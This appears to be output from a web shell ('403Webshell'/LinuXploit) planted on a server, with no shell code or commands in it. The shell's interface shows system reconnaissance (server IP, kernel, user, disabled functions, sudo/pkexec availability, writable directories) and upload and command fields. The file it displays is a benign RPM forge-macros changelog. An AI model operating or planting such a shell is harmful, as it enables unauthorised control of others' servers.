403Webshell
Server IP : 85.112.90.236  /  Your IP : 192.168.1.26
Web Server : Apache
System : Linux 85-112-90-236.cprapid.com 6.12.0-211.7.3.el10_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 12:46:58 EDT 2026 x86_64
User : ftechme ( 1002)
PHP Version : 8.2.32
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/usr/share/doc/forge-srpm-macros/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/usr/share/doc/forge-srpm-macros/NEWS.md
<!--
Copyright (C) 2023 Maxwell G <maxwell@gtmx.me>
SPDX-License-Identifier: GPL-1.0-or-later
-->

NEWS
========

## 0.4.0 - 2024-09-27 <a id='0.4.0'></a>

### Added

- Add support for go.googlesource.com forge

## 0.3.2 - 2024-08-07 <a id='0.3.2'></a>

### Removed

- `forgeversion`: entirely remove warning when `Version:` is set after `Release:`.
  This started causing false positives and confusing users.

## 0.3.1 - 2024-04-10 <a id='0.3.1'></a>

- `forgeversion`: make `Version:` set after `Release:` a warning instead of an
  error to make parsing more resilient

## 0.3.0 - 2024-03-02 <a id='0.3.0'></a>

### Added

- **all: restore compatibility with RPM 4.16 and support EPEL 9**
- packaging: make the RPM noarch. The package does not contain any compiled
  code.

## 0.2.0 - 2023-12-07 <a id='0.2.0'></a>

### Added

- Allow specifying a custom forge scheme

## 0.1.0 - 2023-09-04 <a id='0.1.0'></a>

### Added

- add `-b` flag to `%forgeversion` to override base package version.

### Changed

- `%forgeversion`: use `%version0` instead of `%version` as the base package
  version.
  See the [FPC discussion][FPC discussion] for more context.

[FPC discussion]: https://pagure.io/packaging-committee/pull-request/1295

## 0.0.1 - 2023-08-13 <a id='0.0.1'></a>

Initial release

### Added

- add support for Codeberg
- allow unlimited subgroups in GitLab URLs
- forge.lua: fix syntax error for pagure_ns_fork
- forge.lua: add missing archiveext for pagure_ns_fork
- add %forgeversion to add snapshot info to Version
- add extensive test vectors

### Changed

- Set minimum supported Fedora/RPM version to 37/4.18


Youez - 2016 - github.com/yon3zu
LinuXploit